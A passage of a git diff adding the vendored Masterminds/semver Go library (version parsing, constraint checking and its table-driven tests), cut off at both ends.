"1.0.0", false}, + {"foo", nil, "", true}, + {"<= 1.2", constraintLessThanEqual, "1.2.0", false}, + {"=< 1.2", constraintLessThanEqual, "1.2.0", false}, + {"=> 1.2", constraintGreaterThanEqual, "1.2.0", false}, + {"v1.2", constraintTildeOrEqual, "1.2.0", false}, + {"=1.5", constraintTildeOrEqual, "1.5.0", false}, + {"> 1.3", constraintGreaterThan, "1.3.0", false}, + {"< 1.4.1", constraintLessThan, "1.4.1", false}, + } + + for _, tc := range tests { + c, err := parseConstraint(tc.in) + if tc.err && err == nil { + t.Errorf("Expected error for %s didn't occur", tc.in) + } else if !tc.err && err != nil { + t.Errorf("Unexpected error for %s", tc.in) + } + + // If an error was expected continue the loop and don't try the other + // tests as they will cause errors. + if tc.err { + continue + } + + if tc.v != c.con.String() { + t.Errorf("Incorrect version found on %s", tc.in) + } + + f1 := reflect.ValueOf(tc.f) + f2 := reflect.ValueOf(c.function) + if f1 != f2 { + t.Errorf("Wrong constraint found for %s", tc.in) + } + } +} + +func TestConstraintCheck(t *testing.T) { + tests := []struct { + constraint string + version string + check bool + }{ + {"= 2.0", "1.2.3", false}, + {"= 2.0", "2.0.0", true}, + {"4.1", "4.1.0", true}, + {"!=4.1", "4.1.0", false}, + {"!=4.1", "5.1.0", true}, + {">1.1", "4.1.0", true}, + {">1.1", "1.1.0", false}, + {"<1.1", "0.1.0", true}, + {"<1.1", "1.1.0", false}, + {"<1.1", "1.1.1", false}, + {">=1.1", "4.1.0", true}, + {">=1.1", "1.1.0", true}, + {">=1.1", "0.0.9", false}, + {"<=1.1", "0.1.0", true}, + {"<=1.1", "1.1.0", true}, + {"<=1.1", "1.1.1", false}, + {">0", "0.0.1-alpha", true}, + {">=0", "0.0.1-alpha", true}, + {">0", "0", false}, + {">=0", "0", true}, + {"=0", "1", false}, + } + + for _, tc := range tests { + c, err := parseConstraint(tc.constraint) + if err != nil { + t.Errorf("err: %s", err) + continue + } + + v, err := NewVersion(tc.version) + if err != nil { + t.Errorf("err: %s", err) + continue + } + + a := c.check(v) + if a != tc.check { + t.Errorf("Constraint %q failing with %q", tc.constraint, tc.version) + } + } +} + +func TestNewConstraint(t *testing.T) { + tests := []struct { + input string + ors int + count int + err bool + }{ + {">= 1.1", 1, 1, false}, + {"2.0", 1, 1, false}, + {"v2.3.5-20161202202307-sha.e8fc5e5", 1, 1, false}, + {">= bar", 0, 0, true}, + {">= 1.2.3, < 2.0", 1, 2, false}, + {">= 1.2.3, < 2.0 || => 3.0, < 4", 2, 2, false}, + + // The 3 - 4 should be broken into 2 by the range rewriting + {"3 - 4 || => 3.0, < 4", 2, 2, false}, + } + + for _, tc := range tests { + v, err := NewConstraint(tc.input) + if tc.err && err == nil { + t.Errorf("expected but did not get error for: %s", tc.input) + continue + } else if !tc.err && err != nil { + t.Errorf("unexpectederror for input %s: %s", tc.input, err) + continue + } + if tc.err { + continue + } + + l := len(v.constraints) + if tc.ors != l { + t.Errorf("Expected %s to have %d ORs but got %d", + tc.input, tc.ors, l) + } + + l = len(v.constraints[0]) + if tc.count != l { + t.Errorf("Expected %s to have %d constraints but got %d", + tc.input, tc.count, l) + } + } +} + +func TestConstraintsCheck(t *testing.T) { + tests := []struct { + constraint string + version string + check bool + }{ + {"*", "1.2.3", true}, + {"~0.0.0", "1.2.3", true}, + {"0.x.x", "1.2.3", false}, + {"0.0.x", "1.2.3", false}, + {"0.0.0", "1.2.3", false}, + {"*", "1.2.3", true}, + {"^0.0.0", "1.2.3", false}, + {"= 2.0", "1.2.3", false}, + {"= 2.0", "2.0.0", true}, + {"4.1", "4.1.0", true}, + {"4.1.x", "4.1.3", true}, + {"1.x", "1.4", true}, + {"!=4.1", "4.1.0", false}, + {"!=4.1-alpha", "4.1.0-alpha", false}, + {"!=4.1-alpha", "4.1.0", true}, + {"!=4.1", "5.1.0", true}, + {"!=4.x", "5.1.0", true}, + {"!=4.x", "4.1.0", false}, + {"!=4.1.x", "4.2.0", true}, + {"!=4.2.x", "4.2.3", false}, + {">1.1", "4.1.0", true}, + {">1.1", "1.1.0", false}, + {"<1.1", "0.1.0", true}, + {"<1.1", "1.1.0", false}, + {"<1.1", "1.1.1", false}, + {"<1.x", "1.1.1", true}, + {"<1.x", "2.1.1", false}, + {"<1.1.x", "1.2.1", false}, + {"<1.1.x", "1.1.500", true}, + {"<1.2.x", "1.1.1", true}, + {">=1.1", "4.1.0", true}, + {">=1.1", "4.1.0-beta", false}, + {">=1.1", "1.1.0", true}, + {">=1.1", "0.0.9", false}, + {"<=1.1", "0.1.0", true}, + {"<=1.1", "0.1.0-alpha", false}, + {"<=1.1-a", "0.1.0-alpha", true}, + {"<=1.1", "1.1.0", true}, + {"<=1.x", "1.1.0", true}, + {"<=2.x", "3.1.0", false}, + {"<=1.1", "1.1.1", false}, + {"<=1.1.x", "1.2.500", false}, + {">1.1, <2", "1.1.1", true}, + {">1.1, <3", "4.3.2", false}, + {">=1.1, <2, !=1.2.3", "1.2.3", false}, + {">=1.1, <2, !=1.2.3 || > 3", "3.1.2", true}, + {">=1.1, <2, !=1.2.3 || >= 3", "3.0.0", true}, + {">=1.1, <2, !=1.2.3 || > 3", "3.0.0", false}, + {">=1.1, <2, !=1.2.3 || > 3", "1.2.3", false}, + {"1.1 - 2", "1.1.1", true}, + {"1.1-3", "4.3.2", false}, + {"^1.1", "1.1.1", true}, + {"^1.1", "4.3.2", false}, + {"^1.x", "1.1.1", true}, + {"^2.x", "1.1.1", false}, + {"^1.x", "2.1.1", false}, + {"^1.x", "1.1.1-beta1", false}, + {"^1.1.2-alpha", "1.2.1-beta1", true}, + {"^1.2.x-alpha", "1.1.1-beta1", false}, + {"~*", "2.1.1", true}, + {"~1", "2.1.1", false}, + {"~1", "1.3.5", true}, + {"~1", "1.4", true}, + {"~1.x", "2.1.1", false}, + {"~1.x", "1.3.5", true}, + {"~1.x", "1.4", true}, + {"~1.1", "1.1.1", true}, + {"~1.1", "1.1.1-alpha", false}, + {"~1.1-alpha", "1.1.1-beta", true}, + {"~1.1.1-beta", "1.1.1-alpha", false}, + {"~1.1.1-beta", "1.1.1", true}, + {"~1.2.3", "1.2.5", true}, + {"~1.2.3", "1.2.2", false}, + {"~1.2.3", "1.3.2", false}, + {"~1.1", "1.2.3", false}, + {"~1.3", "2.4.5", false}, + } + + for _, tc := range tests { + c, err := NewConstraint(tc.constraint) + if err != nil { + t.Errorf("err: %s", err) + continue + } + + v, err := NewVersion(tc.version) + if err != nil { + t.Errorf("err: %s", err) + continue + } + + a := c.Check(v) + if a != tc.check { + t.Errorf("Constraint '%s' failing with '%s'", tc.constraint, tc.version) + } + } +} + +func TestRewriteRange(t *testing.T) { + tests := []struct { + c string + nc string + }{ + {"2 - 3", ">= 2, <= 3"}, + {"2 - 3, 2 - 3", ">= 2, <= 3,>= 2, <= 3"}, + {"2 - 3, 4.0.0 - 5.1", ">= 2, <= 3,>= 4.0.0, <= 5.1"}, + } + + for _, tc := range tests { + o := rewriteRange(tc.c) + + if o != tc.nc { + t.Errorf("Range %s rewritten incorrectly as '%s'", tc.c, o) + } + } +} + +func TestIsX(t *testing.T) { + tests := []struct { + t string + c bool + }{ + {"A", false}, + {"%", false}, + {"X", true}, + {"x", true}, + {"*", true}, + } + + for _, tc := range tests { + a := isX(tc.t) + if a != tc.c { + t.Errorf("Function isX error on %s", tc.t) + } + } +} + +func TestConstraintsValidate(t *testing.T) { + tests := []struct { + constraint string + version string + check bool + }{ + {"*", "1.2.3", true}, + {"~0.0.0", "1.2.3", true}, + {"= 2.0", "1.2.3", false}, + {"= 2.0", "2.0.0", true}, + {"4.1", "4.1.0", true}, + {"4.1.x", "4.1.3", true}, + {"1.x", "1.4", true}, + {"!=4.1", "4.1.0", false}, + {"!=4.1", "5.1.0", true}, + {"!=4.x", "5.1.0", true}, + {"!=4.x", "4.1.0", false}, + {"!=4.1.x", "4.2.0", true}, + {"!=4.2.x", "4.2.3", false}, + {">1.1", "4.1.0", true}, + {">1.1", "1.1.0", false}, + {"<1.1", "0.1.0", true}, + {"<1.1", "1.1.0", false}, + {"<1.1", "1.1.1", false}, + {"<1.x", "1.1.1", true}, + {"<1.x", "2.1.1", false}, + {"<1.1.x", "1.2.1", false}, + {"<1.1.x", "1.1.500", true}, + {"<1.2.x", "1.1.1", true}, + {">=1.1", "4.1.0", true}, + {">=1.1", "1.1.0", true}, + {">=1.1", "0.0.9", false}, + {"<=1.1", "0.1.0", true}, + {"<=1.1", "1.1.0", true}, + {"<=1.x", "1.1.0", true}, + {"<=2.x", "3.1.0", false}, + {"<=1.1", "1.1.1", false}, + {"<=1.1.x", "1.2.500", false}, + {">1.1, <2", "1.1.1", true}, + {">1.1, <3", "4.3.2", false}, + {">=1.1, <2, !=1.2.3", "1.2.3", false}, + {">=1.1, <2, !=1.2.3 || > 3", "3.1.2", true}, + {">=1.1, <2, !=1.2.3 || >= 3", "3.0.0", true}, + {">=1.1, <2, !=1.2.3 || > 3", "3.0.0", false}, + {">=1.1, <2, !=1.2.3 || > 3", "1.2.3", false}, + {"1.1 - 2", "1.1.1", true}, + {"1.1-3", "4.3.2", false}, + {"^1.1", "1.1.1", true}, + {"^1.1", "1.1.1-alpha", false}, + {"^1.1.1-alpha", "1.1.1-beta", true}, + {"^1.1.1-beta", "1.1.1-alpha", false}, + {"^1.1", "4.3.2", false}, + {"^1.x", "1.1.1", true}, + {"^2.x", "1.1.1", false}, + {"^1.x", "2.1.1", false}, + {"~*", "2.1.1", true}, + {"~1", "2.1.1", false}, + {"~1", "1.3.5", true}, + {"~1", "1.3.5-beta", false}, + {"~1.x", "2.1.1", false}, + {"~1.x", "1.3.5", true}, + {"~1.x", "1.3.5-beta", false}, + {"~1.3.6-alpha", "1.3.5-beta", false}, + {"~1.3.5-alpha", "1.3.5-beta", true}, + {"~1.3.5-beta", "1.3.5-alpha", false}, + {"~1.x", "1.4", true}, + {"~1.1", "1.1.1", true}, + {"~1.2.3", "1.2.5", true}, + {"~1.2.3", "1.2.2", false}, + {"~1.2.3", "1.3.2", false}, + {"~1.1", "1.2.3", false}, + {"~1.3", "2.4.5", false}, + } + + for _, tc := range tests { + c, err := NewConstraint(tc.constraint) + if err != nil { + t.Errorf("err: %s", err) + continue + } + + v, err := NewVersion(tc.version) + if err != nil { + t.Errorf("err: %s", err) + continue + } + + a, msgs := c.Validate(v) + if a != tc.check { + t.Errorf("Constraint '%s' failing with '%s'", tc.constraint, tc.version) + } else if !a && len(msgs) == 0 { + t.Errorf("%q failed with %q but no errors returned", tc.constraint, tc.version) + } + + // if a == false { + // for _, m := range msgs { + // t.Errorf("%s", m) + // } + // } + } + + v, err := NewVersion("1.2.3") + if err != nil { + t.Errorf("err: %s", err) + } + + c, err := NewConstraint("!= 1.2.5, ^2, <= 1.1.x") + if err != nil { + t.Errorf("err: %s", err) + } + + _, msgs := c.Validate(v) + if len(msgs) != 2 { + t.Error("Invalid number of validations found") + } + e := msgs[0].Error() + if e != "1.2.3 does not have same major version as 2" { + t.Error("Did not get expected message: 1.2.3 does not have same major version as 2") + } + e = msgs[1].Error() + if e != "1.2.3 is greater than 1.1.x" { + t.Error("Did not get expected message: 1.2.3 is greater than 1.1.x") + } + + tests2 := []struct { + constraint, version, msg string + }{ + {"= 2.0", "1.2.3", "1.2.3 is not equal to 2.0"}, + {"!=4.1", "4.1.0", "4.1.0 is equal to 4.1"}, + {"!=4.x", "4.1.0", "4.1.0 is equal to 4.x"}, + {"!=4.2.x", "4.2.3", "4.2.3 is equal to 4.2.x"}, + {">1.1", "1.1.0", "1.1.0 is less than or equal to 1.1"}, + {"<1.1", "1.1.0", "1.1.0 is greater than or equal to 1.1"}, + {"<1.1", "1.1.1", "1.1.1 is greater than or equal to 1.1"}, + {"<1.x", "2.1.1", "2.1.1 is greater than or equal to 1.x"}, + {"<1.1.x", "1.2.1", "1.2.1 is greater than or equal to 1.1.x"}, + {">=1.1", "0.0.9", "0.0.9 is less than 1.1"}, + {"<=2.x", "3.1.0", "3.1.0 is greater than 2.x"}, + {"<=1.1", "1.1.1", "1.1.1 is greater than 1.1"}, + {"<=1.1.x", "1.2.500", "1.2.500 is greater than 1.1.x"}, + {">1.1, <3", "4.3.2", "4.3.2 is greater than or equal to 3"}, + {">=1.1, <2, !=1.2.3", "1.2.3", "1.2.3 is equal to 1.2.3"}, + {">=1.1, <2, !=1.2.3 || > 3", "3.0.0", "3.0.0 is greater than or equal to 2"}, + {">=1.1, <2, !=1.2.3 || > 3", "1.2.3", "1.2.3 is equal to 1.2.3"}, + {"1.1 - 3", "4.3.2", "4.3.2 is greater than 3"}, + {"^1.1", "4.3.2", "4.3.2 does not have same major version as 1.1"}, + {"^2.x", "1.1.1", "1.1.1 does not have same major version as 2.x"}, + {"^1.x", "2.1.1", "2.1.1 does not have same major version as 1.x"}, + {"~1", "2.1.2", "2.1.2 does not have same major and minor version as 1"}, + {"~1.x", "2.1.1", "2.1.1 does not have same major and minor version as 1.x"}, + {"~1.2.3", "1.2.2", "1.2.2 does not have same major and minor version as 1.2.3"}, + {"~1.2.3", "1.3.2", "1.3.2 does not have same major and minor version as 1.2.3"}, + {"~1.1", "1.2.3", "1.2.3 does not have same major and minor version as 1.1"}, + {"~1.3", "2.4.5", "2.4.5 does not have same major and minor version as 1.3"}, + } + + for _, tc := range tests2 { + c, err := NewConstraint(tc.constraint) + if err != nil { + t.Errorf("err: %s", err) + continue + } + + v, err := NewVersion(tc.version) + if err != nil { + t.Errorf("err: %s", err) + continue + } + + _, msgs := c.Validate(v) + e := msgs[0].Error() + if e != tc.msg { + t.Errorf("Did not get expected message %q: %s", tc.msg, e) + } + } +} diff --git a/vendor/github.com/Masterminds/semver/doc.go b/vendor/github.com/Masterminds/semver/doc.go new file mode 100644 index 0000000000..e00f65eb73 --- /dev/null +++ b/vendor/github.com/Masterminds/semver/doc.go @@ -0,0 +1,115 @@ +/* +Package semver provides the ability to work with Semantic Versions (http://semver.org) in Go. + +Specifically it provides the ability to: + + * Parse semantic versions + * Sort semantic versions + * Check if a semantic version fits within a set of constraints + * Optionally work with a `v` prefix + +Parsing Semantic Versions + +To parse a semantic version use the `NewVersion` function. For example, + + v, err := semver.NewVersion("1.2.3-beta.1+build345") + +If there is an error the version wasn't parseable. The version object has methods +to get the parts of the version, compare it to other versions, convert the +version back into a string, and get the original string. For more details +please see the documentation at https://godoc.org/github.com/Masterminds/semver. + +Sorting Semantic Versions + +A set of versions can be sorted using the `sort` package from the standard library. +For example, + + raw := []string{"1.2.3", "1.0", "1.3", "2", "0.4.2",} + vs := make([]*semver.Version, len(raw)) + for i, r := range raw { + v, err := semver.NewVersion(r) + if err != nil { + t.Errorf("Error parsing version: %s", err) + } + + vs[i] = v + } + + sort.Sort(semver.Collection(vs)) + +Checking Version Constraints + +Checking a version against version constraints is one of the most featureful +parts of the package. + + c, err := semver.NewConstraint(">= 1.2.3") + if err != nil { + // Handle constraint not being parseable. + } + + v, _ := semver.NewVersion("1.3") + if err != nil { + // Handle version not being parseable. + } + // Check if the version meets the constraints. The a variable will be true. + a := c.Check(v) + +Basic Comparisons + +There are two elements to the comparisons. First, a comparison string is a list +of comma separated and comparisons. These are then separated by || separated or +comparisons. For example, `">= 1.2, < 3.0.0 || >= 4.2.3"` is looking for a +comparison that's greater than or equal to 1.2 and less than 3.0.0 or is +greater than or equal to 4.2.3. + +The basic comparisons are: + + * `=`: equal (aliased to no operator) + * `!=`: not equal + * `>`: greater than + * `<`: less than + * `>=`: greater than or equal to + * `<=`: less than or equal to + +Hyphen Range Comparisons + +There are multiple methods to handle ranges and the first is hyphens ranges. +These look like: + + * `1.2 - 1.4.5` which is equivalent to `>= 1.2, <= 1.4.5` + * `2.3.4 - 4.5` which is equivalent to `>= 2.3.4, <= 4.5` + +Wildcards In Comparisons + +The `x`, `X`, and `*` characters can be used as a wildcard character. This works +for all comparison operators. When used on the `=` operator it falls +back to the pack level comparison (see tilde below). For example, + + * `1.2.x` is equivalent to `>= 1.2.0, < 1.3.0` + * `>= 1.2.x` is equivalent to `>= 1.2.0` + * `<= 2.x` is equivalent to `<= 3` + * `*` is equivalent to `>= 0.0.0` + +Tilde Range Comparisons (Patch) + +The tilde (`~`) comparison operator is for patch level ranges when a minor +version is specified and major level changes when the minor number is missing. +For example, + + * `~1.2.3` is equivalent to `>= 1.2.3, < 1.3.0` + * `~1` is equivalent to `>= 1, < 2` + * `~2.3` is equivalent to `>= 2.3, < 2.4` + * `~1.2.x` is equivalent to `>= 1.2.0, < 1.3.0` + * `~1.x` is equivalent to `>= 1, < 2` + +Caret Range Comparisons (Major) + +The caret (`^`) comparison operator is for major level changes. This is useful +when comparisons of API versions as a major change is API breaking. For example, + + * `^1.2.3` is equivalent to `>= 1.2.3, < 2.0.0` + * `^1.2.x` is equivalent to `>= 1.2.0, < 2.0.0` + * `^2.3` is equivalent to `>= 2.3, < 3` + * `^2.x` is equivalent to `>= 2.0.0, < 3` +*/ +package semver diff --git a/vendor/github.com/Masterminds/semver/version.go b/vendor/github.com/Masterminds/semver/version.go new file mode 100644 index 0000000000..9d22ea6308 --- /dev/null +++ b/vendor/github.com/Masterminds/semver/version.go @@ -0,0 +1,421 @@ +package semver + +import ( + "bytes" + "encoding/json" + "errors" + "fmt" + "regexp" + "strconv" + "strings" +) + +// The compiled version of the regex created at init() is cached here so it +// only needs to be created once. +var versionRegex *regexp.Regexp +var validPrereleaseRegex *regexp.Regexp + +var ( + // ErrInvalidSemVer is returned a version is found to be invalid when + // being parsed. + ErrInvalidSemVer = errors.New("Invalid Semantic Version") + + // ErrInvalidMetadata is returned when the metadata is an invalid format + ErrInvalidMetadata = errors.New("Invalid Metadata string") + + // ErrInvalidPrerelease is returned when the pre-release is an invalid format + ErrInvalidPrerelease = errors.New("Invalid Prerelease string") +) + +// SemVerRegex is the regular expression used to parse a semantic version. +const SemVerRegex string = `v?([0-9]+)(\.[0-9]+)?(\.[0-9]+)?` + + `(-([0-9A-Za-z\-]+(\.[0-9A-Za-z\-]+)*))?` + + `(\+([0-9A-Za-z\-]+(\.[0-9A-Za-z\-]+)*))?` + +// ValidPrerelease is the regular expression which validates +// both prerelease and metadata values. +const ValidPrerelease string = `^([0-9A-Za-z\-]+(\.[0-9A-Za-z\-]+)*)` + +// Version represents a single semantic version. +type Version struct { + major, minor, patch int64 + pre string + metadata string + original string +} + +func init() { + versionRegex = regexp.MustCompile("^" + SemVerRegex + "$") + validPrereleaseRegex = regexp.MustCompile(ValidPrerelease) +} + +// NewVersion parses a given version and returns an instance of Version or +// an error if unable to parse the version. +func NewVersion(v string) (*Version, error) { + m := versionRegex.FindStringSubmatch(v) + if m == nil { + return nil, ErrInvalidSemVer + } + + sv := &Version{ + metadata: m[8], + pre: m[5], + original: v, + } + + var temp int64 + temp, err := strconv.ParseInt(m[1], 10, 64) + if err != nil { + return nil, fmt.Errorf("Error parsing version segment: %s", err) + } + sv.major = temp + + if m[2] != "" { + temp, err = strconv.ParseInt(strings.TrimPrefix(m[2], "."), 10, 64) + if err != nil { + return nil, fmt.Errorf("Error parsing version segment: %s", err) + } + sv.minor = temp + } else { + sv.minor = 0 + } + + if m[3] != "" { + temp, err = strconv.ParseInt(strings.TrimPrefix(m[3], "."), 10, 64) + if err != nil { + return nil, fmt.Errorf("Error parsing version segment: %s", err) + } + sv.patch = temp + } else { + sv.patch = 0 + } + + return sv, nil +} + +// MustParse parses a given version and panics on error. +func MustParse(v string) *Version { + sv, err := NewVersion(v) + if err != nil { + panic(err) + } + return sv +} + +// String converts a Version object to a string. +// Note, if the original version contained a leading v this version will not. +// See the Original() method to retrieve the original value. Semantic Versions +// don't contain a leading v per the spec. Instead it's optional on +// impelementation. +func (v *Version) String() string { + var buf bytes.Buffer + + fmt.Fprintf(&buf, "%d.%d.%d", v.major, v.minor, v.patch) + if v.pre != "" { + fmt.Fprintf(&buf, "-%s", v.pre) + } + if v.metadata != "" { + fmt.Fprintf(&buf, "+%s", v.metadata) + } + + return buf.String() +} + +// Original returns the original value passed in to be parsed. +func (v *Version) Original() string { + return v.original +} + +// Major returns the major version. +func (v *Version) Major() int64 { + return v.major +} + +// Minor returns the minor version. +func (v *Version) Minor() int64 { + return v.minor +} + +// Patch returns the patch version. +func (v *Version) Patch() int64 { + return v.patch +} + +// Prerelease returns the pre-release version. +func (v *Version) Prerelease() string { + return v.pre +} + +// Metadata returns the metadata on the version. +func (v *Version) Metadata() string { + return v.metadata +} + +// originalVPrefix returns the original 'v' prefix if any. +func (v *Version) originalVPrefix() string { + + // Note, only lowercase v is supported as a prefix by the parser. + if v.original != "" && v.original[:1] == "v" { + return v.original[:1] + } + return "" +} + +// IncPatch produces the next patch version. +// If the current version does not have prerelease/metadata information, +// it unsets metadata and prerelease values, increments patch number. +// If the current version has any of prerelease or metadata information, +// it unsets both values and keeps curent patch value +func (v Version) IncPatch() Version { + vNext := v + // according to http://semver.org/#spec-item-9 + // Pre-release versions have a lower precedence than the associated normal version. + // according to http://semver.org/#spec-item-10 + // Build metadata SHOULD be ignored when determining version precedence. + if v.pre != "" { + vNext.metadata = "" + vNext.pre = "" + } else { + vNext.metadata = "" + vNext.pre = "" + vNext.patch = v.patch + 1 + } + vNext.original = v.originalVPrefix() + "" + vNext.String() + return vNext +} + +// IncMinor produces the next minor version. +// Sets patch to 0. +// Increments minor number. +// Unsets metadata. +// Unsets prerelease status. +func (v Version) IncMinor() Version { + vNext := v + vNext.metadata = "" + vNext.pre = "" + vNext.patch = 0 + vNext.minor = v.minor + 1 + vNext.original = v.originalVPrefix() + "" + vNext.String() + return vNext +} + +// IncMajor produces the next major version. +// Sets patch to 0. +// Sets minor to 0. +// Increments major number. +// Unsets metadata. +// Unsets prerelease status. +func (v Version) IncMajor() Version { + vNext := v + vNext.metadata = "" + vNext.pre = "" + vNext.patch = 0 + vNext.minor = 0 + vNext.major = v.major + 1 + vNext.original = v.originalVPrefix() + "" + vNext.String() + return vNext +} + +// SetPrerelease defines the prerelease value. +// Value must not include the required 'hypen' prefix. +func (v Version) SetPrerelease(prerelease string) (Version, error) { + vNext := v + if len(prerelease) > 0 && !validPrereleaseRegex.MatchString(prerelease) { + return vNext, ErrInvalidPrerelease + } + vNext.pre = prerelease + vNext.original = v.originalVPrefix() + "" + vNext.String() + return vNext, nil +} + +// SetMetadata defines metadata value. +// Value must not include the required 'plus' prefix. +func (v Version) SetMetadata(metadata string) (Version, error) { + vNext := v + if len(metadata) > 0 && !validPrereleaseRegex.MatchString(metadata) { + return vNext, ErrInvalidMetadata + } + vNext.metadata = metadata + vNext.original = v.originalVPrefix() + "" + vNext.String() + return vNext, nil +} + +// LessThan tests if one version is less than another one. +func (v *Version) LessThan(o *Version) bool { + return v.Compare(o) < 0 +} + +// GreaterThan tests if one version is greater than another one. +func (v *Version) GreaterThan(o *Version) bool { + return v.Compare(o) > 0 +} + +// Equal tests if two versions are equal to each other. +// Note, versions can be equal with different metadata since metadata +// is not considered part of the comparable version. +func (v *Version) Equal(o *Version) bool { + return v.Compare(o) == 0 +} + +// Compare compares this version to another one. It returns -1, 0, or 1 if +// the version smaller, equal, or larger than the other version. +// +// Versions are compared by X.Y.Z. Build metadata is ignored. Prerelease is +// lower than the version without a prerelease. +func (v *Version) Compare(o *Version) int { + // Compare the major, minor, and patch version for differences. If a + // difference is found return the comparison. + if d := compareSegment(v.Major(), o.Major()); d != 0 { + return d + } + if d := compareSegment(v.Minor(), o.Minor()); d != 0 { + return d + } + if d := compareSegment(v.Patch(), o.Patch()); d != 0 { + return d + } + + // At this point the major, minor, and patch versions are the same. + ps := v.pre + po := o.Prerelease() + + if ps == "" && po == "" { + return 0 + } + if ps == "" { + return 1 + } + if po == "" { + return -1 + } + + return comparePrerelease(ps, po) +} + +// UnmarshalJSON implements JSON.Unmarshaler interface. +func (v *Version) UnmarshalJSON(b []byte) error { + var s string + if err := json.Unmarshal(b, &s); err != nil { + return err + } + temp, err := NewVersion(s) + if err != nil { + return err + } + v.major = temp.major + v.minor = temp.minor + v.patch = temp.patch + v.pre = temp.pre + v.metadata = temp.metadata + v.original = temp.original + temp = nil + return nil +} + +// MarshalJSON implements JSON.Marshaler interface. +func (v *Version) MarshalJSON() ([]byte, error) { + return json.Marshal(v.String()) +} + +func compareSegment(v, o int64) int { + if v < o { + return -1 + } + if v > o { + return 1 + } + + return 0 +} + +func comparePrerelease(v, o string) int { + + // split the prelease versions by their part. The separator, per the spec, + // is a . + sparts := strings.Split(v, ".") + oparts := strings.Split(o, ".") + + // Find the longer length of the parts to know how many loop iterations to + // go through. + slen := len(sparts) + olen := len(oparts) + + l := slen + if olen > slen { + l = olen + } + + // Iterate over each part of the prereleases to compare the differences. + for i := 0; i < l; i++ { + // Since the lentgh of the parts can be different we need to create + // a placeholder. This is to avoid out of bounds issues. + stemp := "" + if i < slen { + stemp = sparts[i] + } + + otemp := "" + if i < olen { + otemp = oparts[i] + } + + d := comparePrePart(stemp, otemp) + if d != 0 { + return d + } + } + + // Reaching here means two versions are of equal value but have different + // metadata (the part following a +). They are not identical in string form + // but the version comparison finds them to be equal. + return 0 +} + +func comparePrePart(s, o string) int { + // Fastpath if they are equal + if s == o { + return 0 + } + + // When s or o are empty we can use the other in an attempt to determine + // the response. + if s == "" { + if o != "" { + return -1 + } + return 1 + } + + if o == "" { + if s != "" { + return 1 + } + return -1 + } + + // When comparing strings "99" is greater than "103". To handle + // cases like this we need to detect numbers and compare them. + + oi, n1 := strconv.ParseInt(o, 10, 64) + si, n2 := strconv.ParseInt(s, 10, 64) + + // The case where both are strings compare the strings + if n1 != nil && n2 != nil { + if s > o { + return 1 + } + return -1 + } else if n1 != nil { + // o is a string and s is a number + return -1 + } else if n2 != nil { + // s is a string and o is a number + return 1 + } + // Both are numbers + if si > oi { + return 1 + } + return -1 + +} diff --git a/vendor/github.com/Masterminds/semver/version_test.go b/vendor/github.com/Masterminds/semver/version_test.go new file mode 100644 index 0000000000..ff5d644a74 --- /dev/null +++ b/vendor/github.com/Masterminds/semver/version_test.go @@ -0,0 +1,490 @@ +package semver + +import ( + "encoding/json" + "fmt" + "testing" +) + +func TestNewVersion(t *testing.T) { + tests := []struct { + version string + err bool + }{ + {"1.2.3", false}, + {"v1.2.3", false}, + {"1.0", false}, + {"v1.0", false}, + {"1", false}, + {"v1", false}, + {"1.2.beta", true}, + {"v1.2.beta", true}, + {"foo", true}, + {"1.2-5", false}, + {"v1.2-5", false}, + {"1.2-beta.5", false}, + {"v1.2-beta.5", false}, + {"\n1.2", true}, + {"\nv1.2", true}, + {"1.2.0-x.Y.0+metadata", false}, + {"v1.2.0-x.Y.0+metadata", false}, + {"1.2.0-x.Y.0+metadata-width-hypen", false}, + {"v1.2.0-x.Y.0+metadata-width-hypen", false}, + {"1.2.3-rc1-with-hypen", false}, + {"v1.2.3-rc1-with-hypen", false}, + {"1.2.3.4", true}, + {"v1.2.3.4", true}, + {"1.2.2147483648", false}, + {"1.2147483648.3", false}, + {"2147483648.3.0", false}, + } + + for _, tc := range tests { + _, err := NewVersion(tc.version) + if tc.err && err == nil { + t.Fatalf("expected error for version: %s", tc.version) + } else if !tc.err && err != nil { + t.Fatalf("error for version %s: %s", tc.version, err) + } + } +} + +func TestOriginal(t *testing.T) { + tests := []string{ + "1.2.3", + "v1.2.3", + "1.0", + "v1.0", + "1", + "v1", + "1.2-5", + "v1.2-5", + "1.2-beta.5", + "v1.2-beta.5", + "1.2.0-x.Y.0+metadata", + "v1.2.0-x.Y.0+metadata", + "1.2.0-x.Y.0+metadata-width-hypen", + "v1.2.0-x.Y.0+metadata-width-hypen", + "1.2.3-rc1-with-hypen", + "v1.2.3-rc1-with-hypen", + } + + for _, tc := range tests { + v, err := NewVersion(tc) + if err != nil { + t.Errorf("Error parsing version %s", tc) + } + + o := v.Original() + if o != tc { + t.Errorf("Error retrieving originl. Expected '%s' but got '%s'", tc, v) + } + } +} + +func TestParts(t *testing.T) { + v, err := NewVersion("1.2.3-beta.1+build.123") + if err != nil { + t.Error("Error parsing version 1.2.3-beta.1+build.123") + } + + if v.Major() != 1 { + t.Error("Major() returning wrong value") + } + if v.Minor() != 2 { + t.Error("Minor() returning wrong value") + } + if v.Patch() != 3 { + t.Error("Patch() returning wrong value") + } + if v.Prerelease() != "beta.1" { + t.Error("Prerelease() returning wrong value") + } + if v.Metadata() != "build.123" { + t.Error("Metadata() returning wrong value") + } +} + +func TestString(t *testing.T) { + tests := []struct { + version string + expected string + }{ + {"1.2.3", "1.2.3"}, + {"v1.2.3", "1.2.3"}, + {"1.0", "1.0.0"}, + {"v1.0", "1.0.0"}, + {"1", "1.0.0"}, + {"v1", "1.0.0"}, + {"1.2-5", "1.2.0-5"}, + {"v1.2-5", "1.2.0-5"}, + {"1.2-beta.5", "1.2.0-beta.5"}, + {"v1.2-beta.5", "1.2.0-beta.5"}, + {"1.2.0-x.Y.0+metadata", "1.2.0-x.Y.0+metadata"}, + {"v1.2.0-x.Y.0+metadata", "1.2.0-x.Y.0+metadata"}, + {"1.2.0-x.Y.0+metadata-width-hypen", "1.2.0-x.Y.0+metadata-width-hypen"}, + {"v1.2.0-x.Y.0+metadata-width-hypen", "1.2.0-x.Y.0+metadata-width-hypen"}, + {"1.2.3-rc1-with-hypen", "1.2.3-rc1-with-hypen"}, + {"v1.2.3-rc1-with-hypen", "1.2.3-rc1-with-hypen"}, + } + + for _, tc := range tests { + v, err := NewVersion(tc.version) + if err != nil { + t.Errorf("Error parsing version %s", tc) + } + + s := v.String() + if s != tc.expected { + t.Errorf("Error generating string. Expected '%s' but got '%s'", tc.expected, s) + } + } +} + +func TestCompare(t *testing.T) { + tests := []struct { + v1 string + v2 string + expected int + }{ + {"1.2.3", 